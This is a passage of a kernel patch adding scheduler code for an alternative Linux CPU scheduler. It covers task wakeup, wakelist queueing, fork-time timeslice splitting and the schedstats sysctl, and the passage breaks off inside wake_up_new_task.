++	unsigned long flags;
++
++	/*
++	 * Try to restore the old affinity mask. If this fails, then
++	 * we free the mask explicitly to avoid it being inherited across
++	 * a subsequent fork().
++	 */
++	if (!user_mask || !__sched_setaffinity(p, user_mask))
++		return;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	user_mask = clear_user_cpus_ptr(p);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	kfree(user_mask);
++}
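++
++/*
++ * The two helpers above are meant to be used as a pair, e.g. (sketch,
++ * as on arm64 systems where only some CPUs can run 32-bit tasks):
++ *
++ *	force_compatible_cpus_allowed_ptr(p);
++ *		(narrow the affinity to capable CPUs, saving the user mask)
++ *	...
++ *	relax_compatible_cpus_allowed_ptr(p);
++ *		(restore what the user originally asked for)
++ */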
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       const struct cpumask *new_mask, u32 flags)
++{
++	return set_cpus_allowed_ptr(p, new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/** Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is to change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	/*
++	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
++	 * Races such that false-negatives are possible, since they
++	 * are shorter lived than false-positives would be.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_pending() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rq's wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits set. This allows us to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that led to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
++		WRITE_ONCE(p->__state, TASK_RUNNING);
++		trace_sched_wakeup(p);
++		goto out;
++	}
++
++	/*
++	 * If we are going to wake up a thread waiting for CONDITION we
++	 * need to ensure that CONDITION=1 done by the caller can not be
++	 * reordered with p->state check below. This pairs with smp_store_mb()
++	 * in set_current_state() that the waiting thread does.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	smp_mb__after_spinlock();
++	if (!ttwu_state_match(p, state, &success))
++		goto unlock;
++
++	trace_sched_waking(p);
++
++	/*
++	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smp_rmb() lives in __task_needs_rq_lock().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about its own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, consider queueing p on the remote CPU's wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in its current state by avoiding wakeups and/or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
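++
++/*
++ * Illustrative sketch (names are assumptions, not part of this patch):
++ * a callback that samples a task's state while the task is pinned:
++ *
++ *	static int read_state(struct task_struct *p, void *arg)
++ *	{
++ *		*(unsigned int *)arg = READ_ONCE(p->__state);
++ *		return 0;
++ *	}
++ *
++ *	unsigned int state;
++ *	task_call_func(p, read_state, &state);
++ */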
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
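++
++/*
++ * Typical pairing (sketch): the waiter uses the wait loop shown above
++ * ttwu_runnable(), and the waker publishes the condition before waking:
++ *
++ *	CONDITION = 1;
++ *	wake_up_process(waiter_task);
++ *
++ * The full barrier in try_to_wake_up() pairs with set_current_state()
++ * on the waiter side, so the condition store cannot be missed.
++ */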
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
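++
++/*
++ * Worked example of the split above (values illustrative): a parent
++ * with 4ms of slice left at fork keeps 2ms and the child starts with
++ * the same 2ms, so the total of pending slices stays 4ms. Only if the
++ * halved slice drops below RESCHED_NS does the child get a fresh
++ * sched_timeslice_ns, with the parent marked for reschedule.
++ */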
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
